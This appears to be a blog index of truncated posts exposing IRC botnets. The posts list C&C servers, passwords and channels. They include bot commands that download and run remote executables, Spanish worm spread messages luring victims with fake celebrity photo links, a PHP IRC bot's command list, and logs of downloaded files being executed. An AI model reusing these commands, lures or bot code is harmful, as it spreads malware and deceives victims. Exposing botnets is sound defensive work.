Category: Uncategorized

Remote Host Port Number 199.15.234.7 80 203.249.66.5 80 74.63.232.209 5236 PASS ROCKR PRIVMSG #rockspread :[HTTP]: Updated HTTP spread message to “mira esta foto de jlo desnuda http://noticiasyfarandula.com/IMG00359268.JPG mamacita XD |” PRIVMSG #rockspread :[MSN]: Updated MSN spread message to “mira esta foto de jlo desnuda http://noticiasyfarandula.com/IMG00359268.JPG mamacita XD” PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) – RedirectedRead more...

Resolved : [ch1mb4.info] To [74.62.155.207] C&C Server: 74.62.155.207:6060 Server Password: Username: uamethp Nickname: n{DE|XPa}uamethp Channel: #hell (Password: secret) Channeltopic: :!up http://iccperu.com/new.exe 4bbed3842486716553a21477e44fc2ff !mdns http://aniavillegasperu.com/js.txt hosting infos: http://whois.domaintools.com/74.62.155.207

<? /* * * NOGROD. since 2008 * IRC.UDPLINK.NET * * COMMANDS: * * .user <password> //login to the bot * .logout //logout of the bot * .die //kill the bot * .restart //restart the bot * .mail <to> <from> <subject> <msg> //send an email * .dns <IP|HOST> //dns lookup * .download <URL> <filename> //downloadRead more...

Remote Host Port Number 199.15.234.7 80 94.102.0.165 4444 PASS pas217 JOIN #voLwy vol323 PONG :HTTP1.4 NICK n{US|XP-32a}mwwaozy USER mwwaozy 0 * :mwwaozy hosting infos: http://whois.domaintools.com/94.102.0.165

Resolved : [lalorlz1.info] To [88.198.181.16] Resolved : [lalorlz1.info] To [176.9.192.216] rlz1jmv.info not active C&C Server: 88.198.181.16:5236 PASS ROCKR Server Password: Username: raecpnp Nickname: n{DE|XPa}raecpnp Channel: #ROCK (Password: ngrBot) Channeltopic: :,up http://www.jdkim.com//bbs/data/date/24upjmrlzz.exe 73F91FD360F6E8472B39D8AD58A251F6 | ,j #rockspread | ,s PRIVMSG #rockspread :[MSN]: Updated MSN spread message to “mira a miley cyrus desnuda y dopada en un hotelRead more...

Remote Host Port Number 93.95.99.87 1866 NICK n[USA|XP|COMPUTERNAME]pxzflri USER hh “” “lol” :hh Now talking in #!h! Modes On: [ #!h! ] [ +smntu ] .load /99/106/112/81/55/59/40/110/116/35/105/120/111/108/117/108/110/38/127/122/100/56/126/9/22/45/45/35/61/47/45/56/47/117/104/83/104/119/126/71/120/46/102/126/105/ hosting infos: http://whois.domaintools.com/93.95.99.87

Remote Host Port Number irc.r00t.me.uk 7007 PASS gBot NICK n{USA|XP}eqqcbip USER n{USA|XP}eqqcbip 0 0 :n{USA|XP}eqqcbip i dont have the exe to find more infos so try to find chanels your self this botnet is from same guy here:http://www.exposedbotnets.com/2011/06/ircircattinfogbot-variant-hosted-in.html hosting infos: http://whois.domaintools.com/193.107.16.113

Remote Host Port Number 199.15.234.7 80 70.38.98.236 80 70.38.98.237 80 60.190.223.42 5101 PASS hax0r PRIVMSG #US! :[d=”http://img102.herosh.com/2012/01/14/551459105.gif” s=”65536 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.tmp” – Download retries: 0 PRIVMSG #US! :[d=”http://img103.herosh.com/2012/01/14/594572320.gif” s=”61440 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data2.tmp” – Download retries: 0 PRIVMSG #US! :[d=”http://img103.herosh.com/2012/01/04/210592960.gif” s=”27648 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data3.tmp”Read more...